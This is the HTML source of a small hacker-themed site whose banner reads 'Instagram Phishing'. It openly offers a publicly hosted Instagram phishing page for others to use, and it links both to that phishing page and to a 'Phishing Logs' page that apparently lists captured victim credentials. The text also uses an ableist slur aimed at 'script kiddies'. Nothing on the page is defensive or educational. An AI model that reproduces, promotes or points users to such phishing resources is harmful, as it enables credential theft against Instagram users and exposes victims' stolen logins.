<!DOCTYPE html>
<html>

<head>
   <title>Skotos</title>
</head>
<style type="text/css">
   body {
      background-image: url(data:image/jpeg;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAARgAA/+4ADkFkb2JlAGTAAAAAAf/bAIQABAMDAwMDBAMDBAYEAwQGBwUEBAUHCAYGBwYGCAoICQkJCQgKCgwMDAwMCgwMDQ0MDBERERERFBQUFBQUFBQUFAEEBQUIBwgPCgoPFA4ODhQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgABgAFAwERAAIRAQMRAf/EAFMAAQAAAAAAAAAAAAAAAAAAAAgBAQEAAAAAAAAAAAAAAAAAAAACEAACAgIDAAAAAAAAAAAAAAAREwESAEFCMxURAQAAAAAAAAAAAAAAAAAAAAD/2gAMAwEAAhEDEQA/AApHnIkrYuK917rknibgaGWP/9k=);
   }
   h1 {
      color: #FF0000;
      font-size: 15px;
   }
   .but {
      background-color: Transparent;
      border: 3px solid #ffff00;
      color: red;
      font-family: Arial;
      font-size: 15px;
      font-weight: bold;
      text-decoration: none;
      white-space: nowrap;
      text-align: center;
      width: 130px;
      display: inline-block;
      color: #ff0000;
      padding: 10px 20px;
      text-decoration: none;
   }
   p {
      color: red;
      font-family: "Courier";
      font-size: 20px;
      margin: 10px 0 0 10px;
      white-space: nowrap;
      width: 30em;
   }
   #main {
      margin: 60px auto;
      height: 30px;
   }
   #main ul li {
      display: inline-block;
      vertical-align: top;
      margin: 0 13px 2px 22px;
      height: 10px;
   }
   #main ul {
      text-align: center;
   }

a:link {
    text-decoration: none;
}

a:link {
    color: #ff0000;
}

a:visited {
    color: #ff0000;
}

a:hover {
    color: #ff0000;
}


a:active {
    color: #ff0000;
}

</style>

<body>
   <center> <pre>
      <h1>
  _____           _                                    _____  _     _     _     _             
 |_   _|         | |                                  |  __ \| |   (_)   | |   (_)            
   | |  _ __  ___| |_ __ _  __ _ _ __ __ _ _ __ ___   | |__) | |__  _ ___| |__  _ _ __   __ _ 
   | | | '_ \/ __| __/ _` |/ _` | '__/ _` | '_ ` _ \  |  ___/| '_ \| / __| '_ \| | '_ \ / _` |
  _| |_| | | \__ \ || (_| | (_| | | | (_| | | | | | | | |    | | | | \__ \ | | | | | | | (_| |
 |_____|_| |_|___/\__\__,_|\__, |_|  \__,_|_| |_| |_| |_|    |_| |_|_|___/_| |_|_|_| |_|\__, |
                            __/ |                                                        __/ |
                           |___/                                                        |___/ 


</h1> </center>
<font color="red">
<center>
   <fieldset>
      <legend align="center">Go To</legend>
      <a type="button" class="but" href="ser.html">Services</a>
      <a type="button" class="but" href="res.html">Resources</a>
      <a type="button" class="but" href="con.html">Contact</a>
   </fieldset>
<br>


</center>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<br><br>
<center>
<fieldset>
<h2>Information</h2>
<font color="white">
I have an Instagram Phishing page hosted for the Public. Sadly, you script kiddies are going to use my work since you can't even make a basic phsihng page. Don't feel special, I'm not supporting your autism. I'm just analyzing the data retrieved. 
<br></font>
<h2>Access</h2>
<font color="white">
Phishing Link: <a href="http://inst.luanet.tk" target="_blank">Click Here</a>
<br><br>
Phishing Logs: <a href="http://inst.luanet.tk/usr.html" target="_blank">Click Here</a>
</font>

</center>
</fieldset>

